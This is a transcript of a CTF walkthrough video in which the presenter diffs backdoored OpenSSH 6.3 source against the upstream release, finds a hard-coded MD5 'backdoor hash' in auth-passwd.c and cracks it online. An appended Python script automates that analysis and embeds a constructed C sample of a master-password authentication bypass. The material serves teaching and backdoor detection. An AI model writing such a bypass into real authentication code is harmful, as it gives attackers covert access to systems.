What's going on, everybody? My name is John Hammond. Welcome back to the YouTube video, still looking at the All Army CyberStakes, or ACI CTF. So this challenge I want to showcase is called "Can You Look This Over?" It's 450 points in the Miscellaneous category. At the time of recording it has 172 solves. It's Saturday and the game should end Sunday night, so we'll see how many more that gets.

It says: "Our ops guy found a malware author staging server. We managed to exfiltrate the source to a backdoor they're spreading." They give us a download here, so I'll grab that link location. "I need you to report back once you've cracked their secret password."

Okay, so let's fire up a terminal. I'll hop on over to a directory here, and I'll make a directory for this, "Can You Look This Over". See the end of that guy, and let's wget that file down. There we go. Looks like a gzip file, so I'll go ahead and gunzip it, and it's still a tar, so let's tar xzvf all on that guy. And there we go, now we have a backdoor directory with a lot of files in here. I see a lot of references to SSH. I care about what this software really is. Seemingly it's SSH, right, or OpenSSH. I want to determine what it actually might be version-wise, so I see this version header file. So let's cat that out just to take a look. Okay, it looks like it's OpenBSD; that might just be for BSD itself. #define SSH_VERSION "OpenSSH_6.3". Okay, so if this is a modified and manipulated version of OpenSSH version 6.3, then I want to be able to take the differences between it and the original OpenSSH 6.3. So I'll try and go scour the internet for a download for OpenSSH version 6.3. Maybe I could download this somewhere. Looks like a lot of vulnerability references. I want to download, so if I search for "download", does that work for me? Linux From Scratch offers it, Slackware seems to have some references. This is just the release page on the OpenSSH website. Can I download it from them? Will they give me? There for OpenBSD, ftp, 8.2.
Can I get 6.3? Maybe. Oh well, theirs isn't portable, and the version number on this one is SSH portable. Maybe some of the others might have that. Oh yeah, OpenSSH 6.3: Slackware, or the Beyond Linux From Scratch one, has a download. So let's get that one, and that has the p1 that they reference here as well, so maybe that is good. Let's wget that guy down. Takes a little bit of time to download, but he's cruising through it. Okay, so now let's go ahead and gunzip that OpenSSH guy and tar to extract him one more time. That should be an x, not a z. There we go. Okay, so now we have OpenSSH 6.3. Let's cat out that version number to make sure it's the same. Looks to be. Okay, fantastic.

So what I'm gonna do is, I actually want to be able to compare all of these files at the exact same time. It might be kind of dirty, it might be kind of messy, but it might still at least work for me. So if I grep -r for everything, it will return literally all the output of all the files that it can get. I don't have to do this inside of the current directory, so it doesn't include that parent name in the file path that's displayed over on the left here. So if I grep all these and I put these in, like, a parent directory original.txt, so move up, now I have that original.txt for all of the files in the original source code. I can do the exact same thing in the backdoor: if I grep -r everything and put that in, like, theirs.txt, or what they kind of offer me, now I have both the original and the backdoor, all their files, and I could compare them kind of easily, because grep will allow me to do that since it's all source code. Right, so I could potentially just diff the original and theirs. I might be able to see some particularly interesting stuff. I also immediately see a little auth-passwd, and it says there's a static char hash, the backdoor hash, this guy here.
So that looks like hex. I could just steal this and work with it, but I did want to show you another trick and tool I really, really like: meld. It's a GUI diff viewer. So if I were to make a file comparison, I could go specify "Can You Look This Over", the original on the left and theirs on the right. Once I start to compare all of this, meld will show me everything that's in both files, so I would still be able to see, okay, these lines match on both the left-hand side for the original and the right-hand side for theirs. Eventually it should start to find some differences. You can see it's still chewing up there, and it's taking a little bit more time to work through it all, but I'll let this go and we'll start to go look at that hash. But I want to show you where you could potentially see it with that tool as well.

Let's grab this hash. I'm gonna open it up in just Sublime Text and make a little hash.txt. I'll drag this down so you can see it. There we go. And let's go remove all those 0x's. Let's remove all of the commas. So let's go ahead and grab this hash and I'll try and crack it online. I'll use a little CrackStation, just because that's kind of the quick and easy one. If I spit that in there... yep, I'm not a robot, crack hashes. It could not find it.

So then I kind of went back to the drawing board, and I was looking at the diff here. I know that, well, okay, this is an MD5 theoretically, right? MD5_DIGEST_LENGTH. We can assume they're using some MD5 algorithm stuff. This has to be MD5. So I try a little bit more googling. I did "crack md5 hash online", and eventually I found this little cmd5 guy, and that one seemed to work for me. So if I slap that into this, it will decrypt it, and that is my hash. It is "bb me zero y"; yours might be different. I think they were doing some of the randomly generated stuff. So if we were to go ahead and paste that in this Can You Look This Over challenge, that is the whole flag that you need.
It doesn't need the ACI curly braces and the regular flag format. So that was that; that was that challenge. Just being able to simply kind of take a look at the differences here, using all the files all at once. I tend to like that technique because I could really see, okay, this is all of the output from either side in every single file, because there wasn't going to be a ton. And I mean, if there were going to be a ton, then I could look through it with meld, which was awesome. But the auth.c and auth-passwd.c would be pretty easy to detect once we had the right OpenSSH version number. So okay.

Hey, thank you guys so much for watching. If you guys did like this video, please do press that like button. If you'd like to leave a comment, that'd be fantastic. If you'd like to subscribe, do all those YouTube algorithm things, I would be super duper grateful. Thank you so much for your support. If you would like to support in some other ways, PayPal, Patreon, link in description. I'm super duper grateful. Thank you, thank you, thank you. Love you guys on Patreon, Discord, LinkedIn, Facebook, Twitter, all of the social media things. I'll see you in the next video. Take care.
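The steps done by hand in the video (dump both trees with grep -r, diff them, strip the 0x prefixes and commas from the static hash array, read the digest type off MD5_DIGEST_LENGTH) can be scripted. The following is an added example and is not John Hammond's code or part of the CTF files: it builds two small constructed source trees (a stand-in upstream auth-passwd.c and a stand-in backdoored copy whose hard-coded digest is the MD5 of the string "password"), diffs them per file the way diff -r would, pulls any byte-array initialisers the suspect side adds out as plain hex strings, identifies the digest by its length, and checks a couple of constructed candidate strings locally instead of pasting the hash into a web lookup. The file names, the array name backdoor_hash and the candidate list are all assumptions.

```python
"""Diff a suspect source tree against the upstream release and pull out any
hard-coded digest arrays the suspect copy adds. Added example, not the
video's code; the sample sources below are constructed stand-ins."""
import difflib
import hashlib
import os
import re
import tempfile

# Constructed sample sources. Only auth-passwd.c differs between the trees.
UPSTREAM = {
    "version.h": '#define SSH_VERSION "OpenSSH_6.3"\n',
    "auth-passwd.c": (
        '#include "auth.h"\n'
        "int auth_password(Authctxt *authctxt, const char *password)\n"
        "{\n"
        "    return sys_auth_passwd(authctxt, password);\n"
        "}\n"
    ),
}
SUSPECT = dict(UPSTREAM)
SUSPECT["auth-passwd.c"] = (
    '#include "auth.h"\n'
    "#include <openssl/md5.h>\n"
    "/* constructed: MD5 of the string 'password' */\n"
    "static const unsigned char backdoor_hash[MD5_DIGEST_LENGTH] = {\n"
    "    0x5f, 0x4d, 0xcc, 0x3b, 0x5a, 0xa7, 0x65, 0xd6,\n"
    "    0x1d, 0x83, 0x27, 0xde, 0xb8, 0x82, 0xcf, 0x99 };\n"
    "int auth_password(Authctxt *authctxt, const char *password)\n"
    "{\n"
    "    unsigned char d[MD5_DIGEST_LENGTH];\n"
    "    MD5((const unsigned char *)password, strlen(password), d);\n"
    "    if (memcmp(d, backdoor_hash, MD5_DIGEST_LENGTH) == 0)\n"
    "        return 1;  /* master-password bypass */\n"
    "    return sys_auth_passwd(authctxt, password);\n"
    "}\n"
)

def write_tree(root, files):
    """Materialise a {relative_path: contents} mapping under root."""
    for rel, text in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(text)
    return root

def read_tree(root):
    """Return {relative_path: list_of_lines} for every file under root."""
    out = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            with open(full, errors="replace") as fh:
                out[os.path.relpath(full, root)] = fh.readlines()
    return out

def diff_trees(orig_root, theirs_root):
    """Unified diff per relative path; only files that differ (or exist on
    one side only) are reported, which is what `diff -r` shows."""
    orig, theirs = read_tree(orig_root), read_tree(theirs_root)
    report = {}
    for rel in sorted(set(orig) | set(theirs)):
        lines = list(difflib.unified_diff(orig.get(rel, []), theirs.get(rel, []),
                                          "original/" + rel, "theirs/" + rel))
        if lines:
            report[rel] = lines
    return report

HEX_BYTE = re.compile(r"0x([0-9a-fA-F]{2})")

def extract_hex_arrays(diff_lines):
    """Find C byte-array initialisers {0x.., 0x.., ...} on the added side of
    a diff and return each as a plain hex string (0x and commas stripped,
    the same clean-up done by hand in the editor)."""
    added = "".join(l[1:] for l in diff_lines
                    if l.startswith("+") and not l.startswith("+++"))
    arrays = []
    for body in re.findall(r"\{([^}]*)\}", added):
        raw = HEX_BYTE.findall(body)
        if len(raw) >= 16:          # digests are at least 16 bytes; skip small tables
            arrays.append("".join(raw).lower())
    return arrays

def digest_kind(nbytes):
    """Guess the digest from its length, as reading MD5_DIGEST_LENGTH does."""
    return {16: "md5", 20: "sha1", 32: "sha256"}.get(nbytes, "unknown")

def check_candidates(hex_hash, candidates):
    """Offline check of a few candidate strings against the digest; returns
    the matching candidate or None."""
    algo = digest_kind(len(hex_hash) // 2)
    if algo == "unknown":
        return None
    for cand in candidates:
        if hashlib.new(algo, cand.encode()).hexdigest() == hex_hash:
            return cand
    return None

def run_demo():
    """Build both constructed trees in a temp dir and run the whole pipeline."""
    with tempfile.TemporaryDirectory() as tmp:
        orig = write_tree(os.path.join(tmp, "original"), UPSTREAM)
        theirs = write_tree(os.path.join(tmp, "theirs"), SUSPECT)
        diffs = diff_trees(orig, theirs)
        arrays = extract_hex_arrays(diffs.get("auth-passwd.c", []))
        match = check_candidates(arrays[0], ["hunter2", "password"]) if arrays else None
        return sorted(diffs), arrays, match

if __name__ == "__main__":
    changed, arrays, match = run_demo()
    print("files that differ:", changed)   # ['auth-passwd.c']
    print("embedded digests :", arrays)    # ['5f4dcc3b5aa765d61d8327deb882cf99']
    print("candidate match  :", match)     # password
```

On real trees, point diff_trees at the two extracted directories instead of the constructed ones; version.h is included above only to show that identical files produce no diff entry and so never reach the array extractor.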